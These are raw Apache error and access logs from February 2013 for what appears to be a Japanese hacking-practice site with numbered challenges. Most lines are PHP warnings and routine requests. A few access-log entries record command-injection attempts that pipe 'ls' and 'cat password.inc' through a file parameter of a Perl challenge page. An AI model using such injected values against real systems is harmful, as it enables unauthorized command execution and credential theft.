[Wed Feb 13 01:55:01 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/func.php on line 3, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:55:01 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/bord_js.php on line 14, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:55:06 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/form_js.php on line 23, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:55:06 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/func.php on line 3, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:55:06 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/bord_js.php on line 14, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 02:00:58 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/form_js.php on line 23, referer: http://www.hackerschool.jp/hack/take19.php
[Wed Feb 13 02:00:58 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/func.php on line 3, referer: http://www.hackerschool.jp/hack/take19.php
[Wed Feb 13 02:00:58 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/bord_js.php on line 14, referer: http://www.hackerschool.jp/hack/take19.php
[Wed Feb 13 02:07:08 2013] [error] [client 121.108.50.78] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/take21.php
[Wed Feb 13 02:07:08 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: password in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/pocketFunction.php on line 75, referer: http://www.hackerschool.jp/hack/take21.php
[Wed Feb 13 02:07:09 2013] [error] [client 121.108.50.78] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:09 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: f in /var/www/hackerschool.jp/hack/bbs/lib/Pocket/class/Image.php on line 80, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: password in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/pocketFunction.php on line 75, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: author_name in /var/www/hackerschool.jp/hack/bbs/webapp/modules/pc/actions/view/topicCommentAction.php on line 46, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: author_email in /var/www/hackerschool.jp/hack/bbs/webapp/modules/pc/actions/view/topicCommentAction.php on line 47, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/bbs/?m=pc&a=topicComment.view&topic_id=7
[Wed Feb 13 02:07:16 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: f in /var/www/hackerschool.jp/hack/bbs/lib/Pocket/class/Image.php on line 80, referer: http://www.hackerschool.jp/hack/bbs/?m=pc&a=topicComment.view&topic_id=7
[Wed Feb 13 02:08:28 2013] [error] [client 121.108.50.78] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/take21.php
[Wed Feb 13 02:08:28 2013] [error] [client 121.108.50.78] PHP Notice: Undefined index: password in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/pocketFunction.php on line 75, referer: http://www.hackerschool.jp/hack/take21.php
[Wed Feb 13 02:09:25 2013] [error] [client 121.108.50.78] script ‘/var/www/hackerschool.jp/hack/take20/index.php’ not found or unable to stat
[Wed Feb 13 02:16:27 2013] [error] [client 121.108.50.78] PHP Fatal error: Call to undefined method DB_Error::prepare() in /var/www/hackerschool.jp/hack/data/class/SC_DbConn.php on line 43, referer: http://www.hackerschool.jp/hack/take21.php

アクセスログ

114.160.116.138 – – [13/Feb/2013:01:11:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:11:54 +0900] “POST /hack/take10.php HTTP/1.1” 200 19948
119.240.206.111 – – [13/Feb/2013:01:11:57 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:11:58 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:11:59 +0900] “POST /hack/take10.php HTTP/1.1” 200 19948
119.240.206.111 – – [13/Feb/2013:01:12:01 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:01 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:03 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:05 +0900] “POST /hack/take10.php HTTP/1.1” 200 19947
119.240.206.111 – – [13/Feb/2013:01:12:07 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:12:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
119.240.206.111 – – [13/Feb/2013:01:12:08 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
180.43.43.180 – – [13/Feb/2013:01:12:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:12:13 +0900] “POST /hack/take10.php HTTP/1.1” 200 19953
119.240.206.111 – – [13/Feb/2013:01:12:15 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:15 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:17 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:21 +0900] “POST /hack/take10.php HTTP/1.1” 200 19953
119.240.206.111 – – [13/Feb/2013:01:12:23 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:25 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:29 +0900] “POST /hack/take10.php HTTP/1.1” 200 20004
219.111.95.167 – – [13/Feb/2013:01:12:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
119.240.206.111 – – [13/Feb/2013:01:12:31 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:32 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:33 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
114.160.116.138 – – [13/Feb/2013:01:12:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:12:47 +0900] “POST /hack/take10.php HTTP/1.1” 200 19647
119.240.206.111 – – [13/Feb/2013:01:12:50 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:50 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:52 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:12:58 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22662
119.240.206.111 – – [13/Feb/2013:01:13:00 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:13:01 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:13:02 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:13:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:13:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:13:09 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22765
119.240.206.111 – – [13/Feb/2013:01:13:11 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:13:13 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:13:13 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22782
119.240.206.111 – – [13/Feb/2013:01:13:15 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:13:17 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
219.111.95.167 – – [13/Feb/2013:01:13:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:13:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:13:58 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
119.240.206.111 – – [13/Feb/2013:01:14:00 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:00 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:01 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:06 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
58.1.238.166 – – [13/Feb/2013:01:14:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
119.240.206.111 – – [13/Feb/2013:01:14:08 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:08 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:09 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
180.43.43.180 – – [13/Feb/2013:01:14:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:14:11 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:12 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:14 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
119.240.206.111 – – [13/Feb/2013:01:14:17 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:18 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
119.240.206.111 – – [13/Feb/2013:01:14:20 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:20 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:21 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:21 +0900] “GET /hack/font/fontawesome-webfont.ttf?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:21 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22934
119.240.206.111 – – [13/Feb/2013:01:14:23 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:24 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:25 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
219.111.95.167 – – [13/Feb/2013:01:14:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
119.240.206.111 – – [13/Feb/2013:01:14:40 +0900] “GET /hack/take20/index.pl?file=main.txt|ls HTTP/1.1” 200 22863
119.240.206.111 – – [13/Feb/2013:01:14:42 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:43 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
114.160.116.138 – – [13/Feb/2013:01:14:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:14:51 +0900] “GET /hack/take20/index.pl?file=password.inc HTTP/1.1” 200 22933
119.240.206.111 – – [13/Feb/2013:01:14:53 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:14:54 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:15:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
119.240.206.111 – – [13/Feb/2013:01:15:08 +0900] “GET /hack/take20/index.pl?file=main.txt|cat%20password.inc HTTP/1.1” 200 22885
119.240.206.111 – – [13/Feb/2013:01:15:10 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:15:10 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
180.43.43.180 – – [13/Feb/2013:01:15:11 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:15:11 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
66.249.73.113 – – [13/Feb/2013:01:15:11 +0900] “GET /hack/take20/index.pl?file=main.txt%7Ccat%20password.inc HTTP/1.1” 200 22759
119.240.206.111 – – [13/Feb/2013:01:15:25 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22701
119.240.206.111 – – [13/Feb/2013:01:15:28 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:15:28 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:15:29 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
219.111.95.167 – – [13/Feb/2013:01:15:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:15:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:16:04 +0900] “GET /hack/take21.php HTTP/1.1” 200 20691
119.240.206.111 – – [13/Feb/2013:01:16:06 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:07 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:16:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
119.240.206.111 – – [13/Feb/2013:01:16:08 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
180.43.43.180 – – [13/Feb/2013:01:16:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:16:10 +0900] “POST /hack/take21.php HTTP/1.1” 200 20750
119.240.206.111 – – [13/Feb/2013:01:16:12 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:12 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:13 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:16 +0900] “POST /hack/take21.php HTTP/1.1” 200 20750
119.240.206.111 – – [13/Feb/2013:01:16:18 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:18 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:19 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:20 +0900] “GET /hack/font/fontawesome-webfont.ttf?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:20 +0900] “POST /hack/take21.php HTTP/1.1” 200 20794
119.240.206.111 – – [13/Feb/2013:01:16:22 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:22 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:16:23 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
219.111.95.167 – – [13/Feb/2013:01:16:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:16:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:17:00 +0900] “POST /hack/take21.php HTTP/1.1” 200 20794
119.240.206.111 – – [13/Feb/2013:01:17:02 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:17:04 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:17:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:17:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:17:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:17:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:17:47 +0900] “POST /hack/take21.php HTTP/1.1” 200 20794
119.240.206.111 – – [13/Feb/2013:01:17:49 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:17:49 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:17:51 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:18:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:18:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:18:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:18:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:18:49 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:19:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:19:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:19:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:19:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:19:49 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:20:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:20:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:20:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:20:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:20:49 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:21:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:21:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:21:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:21:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:21:49 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:22:02 +0900] “POST /hack/take21.php HTTP/1.1” 200 20795
119.240.206.111 – – [13/Feb/2013:01:22:05 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:06 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:22:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
119.240.206.111 – – [13/Feb/2013:01:22:07 +0900] “POST /hack/take21.php HTTP/1.1” 200 20795
119.240.206.111 – – [13/Feb/2013:01:22:09 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:09 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
180.43.43.180 – – [13/Feb/2013:01:22:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:01:22:11 +0900] “POST /hack/take21.php HTTP/1.1” 200 20795
119.240.206.111 – – [13/Feb/2013:01:22:13 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:13 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:15 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:16 +0900] “POST /hack/take21.php HTTP/1.1” 200 20795
119.240.206.111 – – [13/Feb/2013:01:22:18 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:18 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
119.240.206.111 – – [13/Feb/2013:01:22:20 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
219.111.95.167 – – [13/Feb/2013:01:22:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
119.240.206.111 – – [13/Feb/2013:01:22:46 +0900] “POST /hack/take21.php HTTP/1.1” 200 20795
119.240.206.111 – – [13/Feb/2013:01:22:48 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
114.160.116.138 – – [13/Feb/2013:01:22:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:22:50 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 304 –
58.1.238.166 – – [13/Feb/2013:01:23:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:23:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:23:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:23:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:23:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:24:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:24:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
219.111.95.167 – – [13/Feb/2013:01:24:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:24:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:24:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:25:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:25:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
114.157.52.134 – – [13/Feb/2013:01:25:20 +0900] “GET /favicon.ico HTTP/1.1” 200 41246
219.111.95.167 – – [13/Feb/2013:01:25:31 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 314
114.160.116.138 – – [13/Feb/2013:01:25:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 1212
119.240.206.111 – – [13/Feb/2013:01:25:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
58.1.238.166 – – [13/Feb/2013:01:26:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
